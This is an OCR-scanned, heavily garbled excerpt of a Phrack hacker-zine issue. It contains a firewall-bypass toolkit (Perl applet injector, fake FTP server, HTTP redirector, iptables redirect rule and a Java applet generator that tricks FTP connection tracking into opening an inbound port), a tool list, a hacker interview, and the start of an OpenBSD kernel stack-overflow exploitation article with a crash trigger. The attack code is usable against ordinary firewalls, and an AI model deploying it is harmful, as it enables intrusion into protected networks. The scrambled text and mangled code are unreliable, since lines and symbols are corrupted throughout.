standard J-STD-025A. I hope you learned a little bit more about the 
surveillance capabilities of LEAs. If you have any questions feel free to 
contact me. Email address: s abov 


-—-[ 5 - Java tears down the Firewall 


Recently there has been much hype about various 

insecurities in firewalls which support tracking of FTP sessions. 
They could be tricked into thinking someone was opening an 

FTP session by using a second TCP stack for example. I would 
point you to CERT-URL for complete discussion. 

There have been other techniques discussed such as embedding 
some evil tags in HTML files which makes the browser opening 
connections a firewall could interpret as FTP session. 


Consider the following net: 


eal 
w 
uw 


[ Company ] ---- [ firewall ] --- [ some router ] [ WI 


Someone from ’Company’ is browsing the web and has to 
pass his packets across some router that is not under control 
by Company but by attacker. Very common scenario no? 


A few tools have been compiled to circumvent such setup. 
I would even say, aS soon as you enable FTP tracking you are lost. 
More than one way ends in Rome. 
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the small tools in short. 


Attacker installs this on some router and 


sets up redirect rul 


class-inject: 


le to port 8888. 


Attacker starts this with eftepe.class. 


will redirect the HI! 


[ML requests to this mini-httpd. 


browser inside Company which is shielded by firewall 


html-redirect 
It forces 
to load 


the Java applet. This applet simulates active FTP 


session to 


some router and it is allowed so because security manager sees 


some router as origin of eftepe.class. Firewall 


will 


then open 


port 7350 inbound so you can connect from some router:20 to Company:7350. 


ftpd: Attacker must run this on some router in order to simulate FTP 


session. 


createclass: script to create th 
using apropriate IP (of some router) 


and port 


Attacker could also sit on WEB 
java applets. So take car 


(i.e. 
becaus 


phrack.org :) 


It is really that simple, 
thats why you find it here as a add-on. 


<classinject> 
!/usr/bin/perl -w 


Puts a classfile into remote browser 


use 1I10::Socket; 


sub usage 


{ 


print "Usage: $0 <class file>\n\n"; 
exit; 

} 

my Sclassfile = shift || usage(); 


my Sclass; 
my Sclasslen = 


(stat (Sclassfile)) [7]; 


open I, "<Sclassfile" or die $!; 

read I, Sclass, $classlen; 

close I; 

my S$sock = new 10::Socket::INET->new(Listen => 10, 


X runs on port 6000. 


correct java code which is 
(on Company) 


then 


and embed evil 


:7) 


and its not even worth an own article, 


LocalPort => 8080, 


Reuse => 1) or die $!; 
my Sconn; 
for (77) { 
next unless $conn = Ssock->accept (); 
if (fork() > 0) { 
Sconn->close(); 
next; 
} 
my Srequest = <$conn>; 
if (Srequest =" /Sclassfile/) { 
my S$classcontent = "HTTP/1.0 200 OK\r\n". 
"Server: Apache/1.3.6 (Unix)\r\n". 
"Content-Length: S$classlen\r\n". 
"Content-Type: application/octet-stream\r\n\r\n".Sclass; 
print Sconn S$classcontent; 
print "Injected to ", $conn->peerhost(), "\n"; 
} else { 


print S$conn "<HTML>". 
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"<APPLET CODE=\"Sclassfile\" WIDTH=1 HEIGHT=1>". 
"</APPLET></HTML>\r\n\r\n"; 


} 
Sconn->close(); 
exit (0); 
} 
</classinject> 
<createclass> 
#!/usr/bin/perl -w 


SENV{"PATH"} = SENV{"PATH"}."/usr/lib/java/bin"; 


print "Creating apropriate Java class-file for opeing port > 1023\n"; 


print "Enter IP to connect to on port 21 (e.g. '127.0.0.1’):"; 
my Sip = <STDIN>; chop (Sip); 
print "Enter port to open:"; 


my Sport = <STDIN>; chop (Sport); 
my Spl = int Sport/256; 
my Sp2 = Sport%256; 


open O, ">eftepe.java" or die $!; 
print O<<EOF; 


import java.io.*; 
import java.applet.*; 
import java.util.*; 
import java.net.*; 


public class eftepe extends Applet { 


public void init () 
{ 
try { 
Socket s = new Socket ("Sip", 21); 
OutputStream os = s.getOutputStream(); 
BufferedReader in = new BufferedReader (new InputStreamReader(s.getInputStre 


am())); 
PrintWriter pw = new PrintWriter(os, true); 
in.readLine(); 
pw.printin("USER ftp\\r\\n"); 
in.readLine(); 
pw.printlin("PASS ftp\\r\\n"); 
in.readLine(); 
String port = new String("PORT "); 


String me = InetAddress.getLocalHost ().getHostAddress () ; 
port += me.replace(’.’, ','); 

port += ",Sp1,$p2\\r\\n"; 

pw.println (port); 

for(;;); 


} catch (Exception e) { 
e.printStackTrace()j; 


print "Compiling into classfile...\n"; 
system("javac eftepe.java"); 
print "Done. Results are in eftepe.class\n"; 


</createclass> 


<ftpd> 
#!/usr/bin/perl —-w 


use 1I10::Socket; 
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my Ssock = new 10::Socket::INET->new(Listen => 10 


my Sconn; 


for Ge) 41 


LocalPort => 
Reuse => 1) 


Sconn = Ssock->accept (); 
if (fork() > 0) 
Sconn->close(); 


} 


print S$conn 


next; 


{ 


"220 ready\r\n"; 


<Sconn>; # user 

print $conn "331 Password please\r\n"; 
<Sconn>; pass 

print $conn "230 Login successful\r\n"; 
<Sconn>; port 

print S$conn "200 PORT command successful. 
sleep (36); 

Sconn->close(); 


exit 
} 
</ftpd> 


0; 


<html-redirect> 


iptables -A PR 


!/usr/bin/perl -w 


use 1I10::Socket; 


sub usage 


{ 


Simple HTTP Redirector 


print "Usage: $0 <IP|Host>\n". 


21:% 
or die $!; 


\r\n"; 


EROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888 


"\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n"; 
exit; 
} 
my Sr = shift || usage(); 
my Sredir = "HTTP/1.0 301 Moved Permanently\r\n". 
"Location: http://$r:8080\r\n\r\n"; 


my Sconn; 


for Gyr) 1 


Reuse => 1) 


next unless S$conn = Ssock->accept (); 


if ( 


} 


fork() > 0) 


{ 


Sconn->close(); 


next; 


my Srequest = <Sconn>; 
print S$conn "Sredir"; 


Scon 

exit 
} 
</html-redir 


<testconnect 
#!/usr/bin/p 


use I0::Sock 


n->close(); 
(0); 


ect> 


> 
erl -w 


et; 


my Ssock = new 10::Socket::INET->new(Listen => 10, 
LocalPort => 8888, 


or die $!; 
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sub usage 

{ 
print "Usage: $0 <Host> <Port>\r\n"; 
exit 0; 


} 


my Sa = shift 
my $b shift 


usage (); 
usage (); 


my $conn = 10::Socket::INET->new(PeerAddr => Sa, 
PeerPort => $b, 
LocalPort => 20, 
Type => SOCK_STREAM, 
Proto => ‘tcp’) or die $!; 


print Sconn "GOTCHA\r\n"; 
Sconn->close(); 
</testconnect> 


<conntrack-start> 
!/bin/sh 


sample FTP session tracked firewall for 2.4 linux kernels 
modprobe ip_conntrack_ftp 


iptables -F 


iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHE 


iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED —-J 


iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHE 


iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLIS 


#iptables -A INPUT -p tcp --syn -j LOG 
iptables -A INPUT -p tcp --syn -j DROP 
</conntrack-start> 


U 


4.txt Wed Apr 26 09:43:44 2017 1 


==Phrack Inc.== 


Volume 0x0b, Issue 0x3c, Phile #0x04 of 0x10 


[ TOOL 2 ARMORY ] 


| =--------- =[ packetstorm <http://www.packetstormsecurity.org> ]=------- =| 


This new section, Phrack Toolz Armory, is dedicated to tool annoucements. 
We will showcast selected tools of relevance to the computer underground 
which have been released recently. The tools for #60 have been selected 
in teamwork by the Packet Storm staff and Phrack staff. 


Drop us a mail if you develop something that you think is worth of being 
mentioned her 


1 - nmap 3.1 Statistics Patch 

2 = the=rut 

3 - Openwall GNU/*/Linux (Owl) 1.0 

4 —- Stealth Kernel Patch 

5 -— Memfetch 

6 - Lerzoex 
----[ 1 -— NMAP 3.1 Statistics Patch 
URL : http://packetstormsecurity.org/UNIX/nmap/nmap-3.10ALPHA4 statistics-l.diff 
Author : vitek[at]Jixsecurity.com 


Comment : The Nmap 3.10ALFA Statistics Patch adds the -c switch which 
guesses how much longer the scan will take, shows how many ports 
have been tested, resent, and the ports per second rate. Useful 
for scanning firewalled hosts. 


[ 2 the=Lrut 


URL : http://www.thehackerschoice.com/thc-rut 

Author : anonymous[at]segfault.net 

Comment : RUT (aRe yoU There, pronouced as ’root’) is your first knife on 
foreign network. It gathers informations from local and remote 
networks. 


It offers a wide range of network discovery utilities 

like arp lookup on an IP range, spoofed DHCP request, RARP, 
BOOTP, ICMP-ping, ICMP address mask request, OS fingerprinting, 
high-speed host discovery, 


THC-RUT comes with a OS host Fingerprinter which determines th 
remote OS by open/closed port characteristics, banner matching 
and nmap fingerprinting techniques (Tl, tcpoptions). 


The fingerprinter has been developerd to quickly (10mins) 
categorize hosts on a Class B network. Information sources are 
(amoung others) SNMP replies, telnetd (NVT) negotiation options, 
generic Banner Matching, HTTP-Server version, DCE request and 
tcp options. It is compatible to the nmap-os-fingerprints 
database and comes in addition to this with his own perl regex 


capable fingerprinting database (thcrut-os-fingerprints). 


[ 3 Openwall GNU/*/Linux (Owl) 1.0 (Released 2002-10-13) 


URL : http://www.openwall.com/Owl 
Author : Solar Designer and other hackers. 
Comment : Openwall Linux is the Hacker’s choice platform. The security 


has been defined by people who know what they are doing. Owl 
comes without any useless services running by default, no RPM 
dependencies headache, full featured environment for 
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developers, a large number of usefull tools and a BSD-port-like 
update mechanism. It’s for people who prefer vi over 
click/drag-and-drop sickness to configure the system. 


Openwall GNU/*/Linux (Owl) includes a pre-built copy of John 
the Ripper password cracker ready for use without requiring 

another OS (life system!) and without having to install ona 
hard disk (although that is supported). The CD-booted system 
is fully functional, you may even let it go multi-user with 

virtual consoles and remote shell access. 


John the Ripper is a fast password cracker, currently 
available for many flavors of Unix (11 are officially 
supported, not counting different architectures), DOS, Win32, 
and BeOS. Its primary purpose is to detect weak Unix 
passwords, but a number of other hash types are supported 
aswell. 


This is probably the most secure linux distribution out there. 


[ 4 Stealth Kernel Patch 


URL : http://packetstormsecurity.org/UNIX/patches/linux-2.2.22-stealth.diff.gz 
Author : Sean Trifero <sean[at]innu.org> 
Comment : The Stealth Kernel Patch for Linux v2.2.22 makes the linux kernel 


discard the packets that many OS detection tools use to query the 
TCP/IP stack. Includes logging of the dropped query packets and 
packets with bogus flags. Does a very good job of confusing nmap 
and queso. 


aes) Memfetch 


URL : http://packetstormsecurity.org/linux/security/memfetch.tgz 

Author : Michal Zalewski <lcamtuf[at]ghettot.net> 

Comment : Memfetch dumps the memory of a program without disrupting its 
operation, either immediately or on the nearest fault condition 
(such as SIGSEGV). It can be used to examine suspicious or 
misbehaving processes on your system, verify that processes are 
what they claim to be, and examine faulty applications using your 
favorite data viewer so that you are not tied to the inferior 
data inspection capabilities in your debugger. 


----[ 6 - Lerzoex 
URL : http://www. laurentconstantin.com/en/lcrzoex/ 
http: //www.laurentconstantin.com/en/rzobox/ (front end) 
Author : Laurent Constantin <laurent.constantin@aql.fr> 
Comment : Lerzoex contains over 400 tools to test an Ethernet/IP 
network. It runs under Linux, Windows, FreeBSD, OpenBSD and 


Solaris. Features: 


- sniff/spoof/replay 

-— syslog/ftp/dns/http/telnet clients 
— ping/traceroute 

— web spider 

- tcp/web backdoor 

— data conversion 
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phrack.org:”# cat 


Volume 0x0b, 


| [ 


2:43:44 2017 


PROPHIL 


-bash_history 


==Phrack Inc.== 


Issue Ox3c, Phile #0x05 of 0x10 


tH 


ON HORIZON ] 


Specification 


Handle: 

AKA: 

Handle origin: 
catch him: 


[ Phrack Staff ] 


horizon 

humble, john 

It sounded neat. 

I’m very easy to find. 


Age of your body: mid 20s 
Produced in: USA 
Height & Weight: 5’11" ~165 lbs. 
Urlz: Nope 
Computers: A couple of decent x86 boxes and a lot of 
older stuff.. 
Member of: CostCo 
Projects: Currently, stuff for work, and a few personal 
things that really aren’t that interesting. 
=---=[ Favorite things 
Women: Creativity, intelligence, a sense of style. 
Cars: German 
Foods: Indian, Thai, Korean, Greek, Japanese, Lean Pockets 
Alcohol: Helles, Redbull & Vodka 
Music: Screeching Weasel, Fugazi, Stretch Armstrong, 
Bad Religion, some electronic 
Movies: Big Lebowski, Office Space, Austin Powers, Memento, Pi 
Books & Authors: Sigh.. I wish I read more these days. 
Urls: Can’t think of any... 
I like: Engaging conversation. Sincerity and conviction. 
Solving difficult problems. Mr. Show. Gummi Bears. 
I dislike: Unwarranted arrogance. Unwarranted Gummi Bears. 
|=---=[ Life in 3 sentences 


I’ve never been normal. I’ 


to be generous. 


-=[ Hacker Life 


creative exploitation concepts 
What drives you into Challenging the exploitation of 


PHRACKSTAFF : 
exploit code for t 
time. 
complicated bugs a 
Well, my motivations have 


up with several ancillary 
during my life, 


and they include both the selfish and the altruistic. 


ve always felt a sense of purpose. I’ve tried 


You have found quite a lot of bugs in the past and developed 


hem. Some vulnerabilities required new 


which were not known at that 


nd what methods do you use? 


definitely changed over time. I can come 
reasons that have driven me at different times 
But, 


I think it really comes down to a compulsion to figure all this stuff 


out. 


As far 
budget 
trying 
of its 


as methods, 


authors. This also 


I like 


I try to be somewhat systematic in my approach. 
a good portion of time for just reading through the program, 
to get a feel for its architecture and the mindset and techniques 


ac 


seems to help prime my subconscious. 


to start at the lower layers of a program or system and look for 
any kind of potential unexpected behavior that could percolate upwards. 


I 
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will document each function and brainstorm any potential problems I see 

with it. I will occasionally take a break from documentation, and do the 
considerably more fun work of tracing back some of my theories to see if 
they pan out. 


As far as writing exploits, I generally just try to reduce or eliminate 
the number of things that need to be guessed. 


|=---=[ Passions | What makes you tick 


I’m definitely obsessed with computers. One of my original goals in 
learning to program as a kid was to develop games, so I’ve always been 
kind of passively interested in that. I’m also interested in artificial 
intelligence. 


I’ve been doing Wing Chun kung fu for about two years now, and I find 
that to be really rewarding. 


I spend a decent bit of my time thinking. I like to read lay-person 
oriented overviews of various academic disciplines. I’d really like to 
learn more about biology and neuroscience. 


|=---=[ Which research have you done or which one gave you the most fun? 
I think I’ve had the most fun when collaborating with others. 

=---=[ Memorable Experiences 

Hanging out with sygma, saad, wordsmith, shegget, and all my old irc 


friends. Getting into trouble with colonwq. Long, not entirely coherent, 
chats with rc.local. :> 


[The weekend drinking/hacking/coding sessions at neon’s place. 
boilermakers. Romania. Coding with xaphan. Almost getting fired from my 
university job for hacking Microsoft, and then getting let off the hook 
when one of their security officers called my boss. Helping joey__ write 
his first exploit, and then not understanding how it worked when he had 
finished. Working on various stuff with JoC, cham, module, solo, zorkeres, 
binf, and the rest of the r9 guys. 


Hanging out with Vacuum and RFP before leaving the US. 


The time I spent living in Germany. Working with plaguez and Thomas, two 
absurdly brilliant guys. Living with Howard and Sondee.. eating at the 
Citta. CCC Camp - Meeting TESO, THC, and many others. linux deathmatch. 


Watching people like duke and scut (and many others) get really good, and 
hoping that I somehow helped. 


Accidentally crashing gatekeeper. 


Hanging out in the adm channel. The always interesting discussions with 
str and anti. Racing with K2 to write exploits as Sun advisories came 
out. 


The Firewall-1l speech with Dug and Thomas. 

Finally getting my degree. 

My european tour with dice. HAL. Meeting silvio. Getting smashed in the 
basement of a bar in Poland with the LSD guys. Chilling with Scrippie and 


Dvorvak and the members of a Dutch death metal band. 


Going to a rave in Miami with JJ and ending up in the keys the day before 
a hurricane. 


Watching my little brothers grow up. 
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Tag team coding/auditing with dice. 


Working for cool people - Mike, Jim, Pat. 


German/reversing lessons from Halvar. 
sms’s from srpnsrt. 


Defcon - meeting digit, cheez, charise, zip, gobbles, ill, cain, arakis, 
caddis, ryan, riley, and so many others. 


The fun times I’ve had in Chicago. Greg’s couch. OFP with Paul and 
Sergey. The bachelor party with monti and MJ. Meeting the esteemed Sarlo. 


J}=---=[ What’s your architecture of choice? OS of choice? 


I tend to use what I’m comfortable with or whatever seems appropriate at 
the moment. The three machines that I use most of the time are currently 
running XP, Linux, and OpenBSD. 


|=---=[ Quotes 
"Jesus Christ John McDonald!" 
WwW odd" 


"So, basically, what you are saying is that we should try to find the 
reactors." 


"Hey, I just work here..." 


| =[ Open Interview 

Q: When did you start playing with computers? 

I got a c64 when I was 6. 

Q: When did you had your first contact to the ’scene’? 

1997 or so. 

Q: When did you for your first time connect to the Internet? 

1993. I had a part time job in high school programming for a satellite 


research center that had Internet access. From what I recall, I mainly 
played around on usenet and ftp sites. 


Q: Let’s talk a little bit about free research and Copyright. What’s your 
opinion about "Copyright on exploits"? 


Well, I’m not a lawyer, and I haven’t really looked into it. I think that 
people should be entitled to do what they want with their work, and that 
legal protections are there for a reason. However, I’ve got no idea what 
copyrighting an exploit will actually afford you legally. 


Q: If you could turn the clock backward, what would you do different 
in your young life ? 


That’s a tough one. The Internet has suffered a fair bit for the sake of 
my ego. I think I would have handled certain things with more discretion 
if I’d had a little more perspectiv 


|=---=[ One word comments 


Give a one word comment to the following topics: 


Digital Millennium Copyright Act (DMCA): oceanliner 
KIMBLE (the wannabe-hacker) : hoogedlyboogedly 
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ADM fun 

NAIL : work 

THE SCENE : which? 
Companies buying exploits from hackers : dunno 
IRC : idle 
CERT : maligned 
Full Disclosure Policy > careful 


|=---=[ Would you work for the government/military? Why or why not? 


As much as it suprises me to say it, I don’t really have an ideological 
opposition to working for my government. I think the combination of 
getting a little bit older, spending some time living abroad, and the 
recent events in my country has made me more appreciative of certain 
things. I think it is safe to say I would do it if I believed I was doing 
something positive and I thought it was necessary. Otherwise, I’d avoid 
it because it would just make life more complicated. 


| =[ Please tell our audience a worst case scenario into what the scene 
might turn into. 


I guess I could prognosticate about it becoming factionalized, petty, 
cruel, insecure, and paranoid, but who would I be kidding? 


|=---=[ And if everything works out fine? What’s the best case scenario 
you can imagine? 


As long as there is a place for new people who show promise, I think things 
will be cool. 


|=---=[ Any suggestions/comments/flames to the scene and/or specific people? 
Think for yourself. 
|=---=[ Shoutouts & Greetings 


Hi everyone :> 
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==Phrack Inc.== 
Volume 0x0b, Issue 0x3c, Phile #0x06 of 0x10 


|=---------- =[ Smashing The Kernel Stack For Fun And Profit ]=---------- =| 


[ Sinan "noir" Eren <noir@olympos.org> ] 


DISCLAIMER: 
This article presented here is bound to no organization or company. It is 
the author’s contrubition to the hacker community at large. The research 


and development in this article is done by the author with NO SUPPORT from 
a commercial organization or company. No organization or company should be 
held responsible or credited for this article other than the author 
himself. 
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3.2 - Payload storage problem 
3.3 - Return to user land problem 


4 - Crafting the exploit 


4.1 - Breakpoints & distance Calculation 
4.2 —- Return address overwrite & execution redirection 
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8 - Greetings 
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10 - Code 
--[ 1 - Introduction 


This article is about recent exposures of many kernel level vulnerabilities 
and advances in their exploitation which leads to trusted (oops safe) and 
robust exploits. 


We will focus on 2 recent vulnerabilities in the OpenBSD kernel as our case 
studies. Out of the these we will mainly concentrate on exploitation of the 
select() system call buffer overflow. The setitimer() arbitrary memory 
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overwrite vulnerability will be explained in the code section of this 
article (as inline comments, so as not to repeat what we have already 
covered whilst exploring the select() buffer overflow). 


This paper should not be viewed as an exploit construction tutorial, my 
goal is, rather, to explore and demonstrate generic ways to exploit stack 
overflows and signed/unsigned vulnerabilities in kernel space. 


Case studies will be used to demonstrate these techniques, and reusable 
*BSD "kernel level shellcodes" with many cool features! -- will be 
presented. 


There has been related work done by [ESA] and [LSD-PL], which may 
complement this article. 


[ 2 The Vulnerability: OpenBSD select() syscall overflow 


sys_select(p, v, retval) 
register struct proc *p; 
void *v; 
register_t *retval; 


register struct sys_select_args /* { 
syscallarg(int) nd; 
syscallarg(fd_set *) in; 
syscallarg(fd_set *) ou; 
syscallarg(fd_set *) ex; 
syscallarg(struct timeval *) tv; 

} */ *uap = v; 

fd_set bits[6], *pibits[3], *pobits[3]; 

struct timeval atv; 

int s, nceoll, error = 0, timo; 

Went na} 


( 
( 
( 
( 


[1] if (SCARG(uap, nd) > p->p_fd->fd_nfiles) { 
/* forgiving; slightly wrong */ 
SCARG(uap, nd) = p->p_fd->fd_nfiles; 
} 
[2] ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof (fd_mask) ; 
[3] if (SCARG(uap, nd) > FD_SETSIZE) { 


} 


define getbits(name, x) \ 


4] if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), 
(caddr_t)pibits[x], ni))) \ 
goto done; 
5] getbits(in, 0); 


getbits(ou, 1); 
getbits(ex, 2); 
undef getbits 


To make some sense out of the code above we need to decipher the SCARG 
macro, which is extensively used in the OpenBSD kernel syscall handling 
routines. 


Basically, SCARG() is a macro that retrieves the members of the ’struct 
sys_XXX_args’ structures. 


sys/systm.h:114 


#if BYTE_ORDER == BIG_ENDIAN 
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define SCARG(p, k) ((p)->k.be.datum) /* get arg from args 
pointer */ 

elif BYTE_ORDER == LITTLE_ENDIAN 

define SCARG(p, k) ((p)->k.le.datum) /* get arg from args 


pointer */ 
sys/syscallarg.h:14 


#define syscallarg(x) 


\ 
union { \ 
register_t pad; \ 
struct { x datum; } le; \ 
struct { + 
int8_t pad[ (sizeof (register_t) < sizeof (x)) \ 
2? 0 \ 
sizeof (register_t) sizeof (x)]; \ 
x datum; \ 
} be; \ 
} 
Access to structure members is performed via SCARG() in order to preserve 


alignment along CPU register size boundaries, so that memory accesses will 
be faster and more efficient. 


In order to make use of the SCARG() macro, the declarations need to be done 
as follows (example for select() syscall arguments): 


sys/syscallarg.h:404 


struct sys_select_args { 

[6] syscallarg(int) nd; 
syscallarg(fd_set *) in; 
syscallarg(fd_set *) ou; 
syscallarg(fd_set *) ex; 
syscallarg(struct timeval *) tv; 


( 
( 
( 
( 


}; 


The vulnerability can be described as an insufficient check on the ’nd’ 
argument [6], which is used as the length parameter for userland to kernel 
land copy operations. 


Whilst there is a check [1] on the ’nd’ argument (nd represents the highest 
numbered descriptor plus one, in any of the fd_sets), which is checked 
against the p->p_fd->fd_nfiles (the number of open descriptors that the 
process is holding), this check is inadequate -- ’nd’ is declared as signed 
[6], so it can be negative, and therefore will pass the greater-than check 
[bli 


Then ’nd’ is put through a macro [2], in order to calculate an unsigned 
integer, ‘ni’, which will eventually be used as the the length argument for 
the copyin operation. 


howmany() [2] is defined as follows (sys/param.h line 175): 


#define howmany(x, y) (( (x) +((y)-1))/(y)) 


Expansion of line [2] will look like as follows: 


sys/types.h:157, 169 
#define NBBY 8 /* number of bits in a byte */ 


typedef int32_t fd_mask; 
#define NFDBITS (sizeof(fd_mask) * NBBY) /* bits per mask */ 


i ((nd + (NFDBITS-1)) / NFDBITS) * sizeof (fd_mask) ; 
ni = ((nd + (32 - 1)) / 32) * 4 
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Calculation of /’/ni’ is followed by another check on the ’nd’ argument [3]. 
This check is also passed, since OpenBSD developers consistently forget 
about the signedness checks on the ‘’nd’ argument. Check [3] was done to see 
if the space allocated on the stack is sufficient for the following copyin 
operations, and, if not, then sufficient heap space will be allocated. 


Given the inadequacy of the signed check, we’ll pass check [3] (> 
FD_SETSIZE), and will continue using stack space. This will make our life 
much easier, given that stack overflows are much more trivially exploited 
than heap overflows. (Hopefully, I’11 write a follow-up paper that will 
demonstrate kernel-land heap overflows in the future). 


Finally, the getbits() [4,5] macro is defined and called in order to 
retrieve user supplied fd_sets (readfds, writefds, exceptfds -- these 
arrays contain the descriptors to be tested for ’ready for reading’, ready 
for writing’ or /’have an exceptional condition pending’). 


For exploitation purposes we don’t really care about the layout of the 
fd_sets -- they can be treated as any simple char buffer aiming to overflow 
its boundaries and overwrite the saved ebp and saved eip. 


With this simple test code, we can reproduce the overflow: 


include <stdio.h> 
include <sys/types.h> 


int 
main (void) 
{ 
char *buf; 
buf = (char *) malloc(1024); 
memset (buf, 0x41, 1024); 
select (0x80000000, (fd_set *) buf, NULL, NULL, NULL); 


} 


What happens is; system call number 93 (SYS_select) is dispatched to 
handler sys_select() by the syscall() function, with all user land supplied 
arguments bundled into a sys_select_args structure. 


‘nd’, being 0x80000000 (the smallest negative number for signed 32bit) has 
gone through the size check [1] and, later, the howmany() macro [2] 
calculates unsigned integer ‘ni’ as 0x10000000. The getbits() macro [5] is 
then called with the address of buf (user land, heap) which expands to the 
copyin(buf, kernel_stack, 0x10000000) operation. 


copyin() starts to copy the userland buffer to the kernel stack, a long at 
a time (0x10000000/4 times). However, this copy operation won’t ever fully 
succeed, as the kernel will run out of per-process stack trying to copy 
such a huge buffer from userland -- and will crash on an out of bounds 
write operation. 


--[ 3 - Obstacles encountered in exploitation 


— copyin(uaddr, kaddr, big_number) problem 


First and the most obvious problem is to take control of the size argument 
‘ni’ passed to the copyin operation, since this number is derived from the 
user supplied ‘nd’ argument which, must be negative, we’1ll never be able to 
construct a reasonably "big" number. Actually the "smallest" positive 
number we can construct is 0x10000000. As we have already find out that, 
this number will cause us to hit the end of kernel stack and kernel will 
panic. This is our first obstacle and we’1ll overcome it by exploring how 
copyin() works in the following section. 


— payload storage problem 
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This is a typical problem for every type of exploit (user or kernel land). 
Determining where the most appropriate place is to store the 
payload/shellcode. This problem is rather simple to overcome in kernel 
land exploits and we’1ll talk about the proper solution. 


- clean return to user land problem 


Another problem arises after we overwrite the saved return address and gain 
control, at that point we can be real imaginative on the payload, but we’1l 
run into the trouble of how to return back to user land and be able to 
enjoy our newly altered kernel space! 


--[ 3.1 - Overcoming The Large copyin() Problem 
To be able to solve this problem, we need to read through the copyin() and 
trap() functions and understand their internals. 


We shall start by understanding copyin() user to kernel copy primitive, my 
comments will be inlined: 


sys/arch/i386/i386/locore.s:955 


ENTRY (copyin) 


pushl sesi 
pushl sedi 


Save %esi, %edi 


movl _C_LABEL (curpcb) , seax 
Move the current process control block address (_curpcb) into %eax 
_C_LABEL() is a simple macro that will add an underscore sign to the 


beginning of the symbol name. See sys/arch/i386/include/asm.h: 66 


The process control block is a per-process kernel structure that holds the 
current execution state of a process and differs based on machine 
architecture. It consists of: stack pointer, program counter, general- 
purpose registers, memory management registers and some other architecture 
depended members such as per process LDT’s (i386) and so on. The *BSD 
kernel extends the PCB with software related entries, such as the 
"copyin/out fault recovery" handler (pcb_onfault). Each process control 
block is stored and referenced through the user structure. See 
sys/user.h:61 and [4.4 BSD]. 


[1] pushl so 


Push a ZERO on the stack; this will make sense at the epilog or the 
_copy_fault function, which has the matching ’popl’ instruction. 


[2] movl S_C_LABEL (copy_fault) , PCB_ONFAULT (%eax) 


Move _copy_fault’s entry address into the process control block’s 


pcb_onfault member. This simply installs a special fault handler for 
‘protection’, '’segment not present’ and ’alignment’ faults. copyin() 
installs its own fault handler, _copy_fault, we’ll get back to this when 
exploring the trap() code, since processor faults are handled there. 

movil 16(%Sesp),%esi 

movil 20 (%esp) , Sedi 

movil 24 (Sesp) , Seax 


fo) 


Move the incoming first, second and third arguments to %esi, %edi, %eax 
respectively. %Sesi being the user land buffer, tedi the destination kernel 
buffer and Seax the size. 


/* 
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* We check that the end of the destination buffer is not past the end 


* of the user’s address space. If it’s not, then we only need to 
* check that each page is readable, and the CPU will do that for us. 
ek 

movil Sesi, tedx 

addl Seax, 5edx 


This addition operation is to verify if the user land address plus the size 
(seax) is in legal user land address space. The user land address is moved 
to Sedx and then added to the size (ubuf + size), which will point to the 
supposed end of the user land buffer. 


Ke _C_LABEL (copy_fault) 


This is a smart check to see if previous addition operation has an integer 
over-wrap issue. e.g: the user land address being O0x0ded and size being 
Oxffffffff -—- this unsigned arithmetic operation will overlap and the 
result is going to be O0x0Odec. By design, the CPU will set the carry flag on 
such condition and ’jc’ jump short on carry flag set instruction will take 
us to _copy_fault function which do some clean up and return EFAULT 


cmpl SVM_MAXUSER_ADDRESS, %edx 
ja _C_LABEL (copy_fault) 


Followed by the range check: whether or not the user land address plus size 
is in valid user land address space range. A comparison is done against the 
VM_MAXUSER_ADDRESS constant, which is the end of the user land stack 
(Oxdfbfe000 through obsd 2.6-3.1). If the sum (%edx) is above 
VM_MAXUSER_ADDRESS ‘ja’ (jump above) instruction will make a short jump to 
_copy_fault , eventually leading to the termination of the copy operation. 


3: /* beopy(%esi, %edi, %teax); */ 
cld 
Clear the direction flag, DF = 0, means that the copy operation is going to 


increment the index registers ’%esi and %edi’ 


movil Seax, SECX 
shrl $2,%eCx 
rep 

movsl 


Do the copy operation long at a time, from %Sesi to %edi 


movb Sal,%Scl 
andb $3,%cl 
rep 

movsb 


fo) 


Copy the remaining (size % 4) data, byte at a time. 


movl _C_LABEL (curpcb) , sedx 
popl PCB_ONFAULT (%edx) 


Move the current process control block address into %Sedx, and then pop the 
first value on the stack into the pcb_onfault member (ZERO [1] pushed 


earlier). This means, the special fault handler is cleared from the 
process. 

popl sedi 

popl sesi 


Restore the old values of %edi, %esi 


xorl Seax, Seax 
ret 


Do a return with a return value of zero: Success 
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ENTRY (copy_fault) 


In the case of faults and failures in checks at copyin() this is where we 
drop. 


movl _C_LABEL (curpcb) , sedx 
popl PCB_ONFAULT (%edx) 


Move the current process control block address into %edx and then pop the 
first value on the stack into the pcb_onfault member (ZERO [1] pushed 


earlier). This clears the special fault handler from the process. 
popl sedi 
popl sesi 


Restore the old values of %edi, %esi 


movl SEFAULT, %eax 

ret 
Do a return with a return value of EFAULT (14): Failure 
After this long exploration of the copyin() function we’1ll just take a 
brief look at trap() and check how pcb_onfault is implemented. trap() is 


the main interface to exception, fault and trap handling of the BSD kernel. 


trap.h:51:#define T_PROTFLT 4 /* protection fault */ 
trap.h:63:#define [ SEGNPFL 16 /* segment not present fault 
vk 

trap.h:54:#define T_ALIGNFLT 7 /* alignment fault */ 


sys/arch/i386/i386/trap.c:174 

void 

trap (frame) 
struct trapframe frame; 

{ 
register struct proc *p = curproc; 
int type = frame.tf_trapno; 


switch (type) { 


line: 269 


case T_PROTFLT: 

case T_SEGNPFLT: 

case T_ALIGNFLT: 

/* Check for copyin/copyout fault. */ 
[1] if (p && p->p_addr) { 
[2] pcb = &p->p_addr->u_pcb; 
[:3:} if (pcb->pcbh_onfault != 0) { 
copyfault: 
[4] frame.tf_eip = (int) pcb->pcb_onfault; 
return; 


Faults such as /protection’, '’segment not present’ and ’alignment’ are 
handled all together, through a switch statement in trap() code. The 
appropriate case for the mentioned faults in trap() , initially checks for 
the existence of the process structure and the user structure [1] then 
loads the process control block from the user structure [2], check if the 
pcb_onfault is set [3] if its set, if so, the instruction pointer (Seip) of 
the control block is overwritten with the value of this special fault 
handler [4]. After the process is context switched and given the cpu, it 
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will start running from the new handler code in kernel space. In the case 
of copyin() , execution will be redirected to _copy_fault 


